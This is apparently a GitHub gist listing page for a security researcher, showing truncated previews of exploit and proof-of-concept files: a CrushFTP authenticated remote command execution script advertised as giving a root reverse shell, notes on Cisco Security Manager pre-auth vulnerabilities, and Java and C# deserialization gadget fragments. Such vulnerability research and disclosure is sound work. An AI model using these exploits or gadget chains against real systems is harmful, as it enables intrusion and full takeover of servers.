Frycos

  • Germany
View crushftp_exploit.py
#!/usr/bin/env python3
"""
Author: @frycos
Authenticated Remote Command Execution in all CrushFTP versions
User account has to be admin or needs job creation permissions
Should give you a root reverse shell in most cases
Vendor website: https://crushftp.com/
View CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently, from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. The release notes didn't state anything about the vulnerabilities, and security advisories were not published. All payloads are processed in the context of NT AUTHORITY\SYSTEM.

View URLDNSequals.java
/* ysoserial URLDNS gadget
* but this time with equals() trampoline
* hashcode is not set to -1
* author: @frycos
*/
static void buildDNSGadget(String url) throws Exception {
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler);
View PartItemGadget.java
/*
* author: @frycos
* heavily inspired by ysoserial FileUpload gadget
*
* Don't forget needed imports:
* import org.apache.catalina.connector.Request,
* import org.apache.catalina.fileupload.Multipart,
* and e.g. import org.glassfish.grizzly.servlet.WebappContext
*
* only applicable for non-default classpaths (but seen "in the wild") including Glassfish's web-core.jar
View CheckTypedDeserialization.cs
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
namespace CheckTypedDeser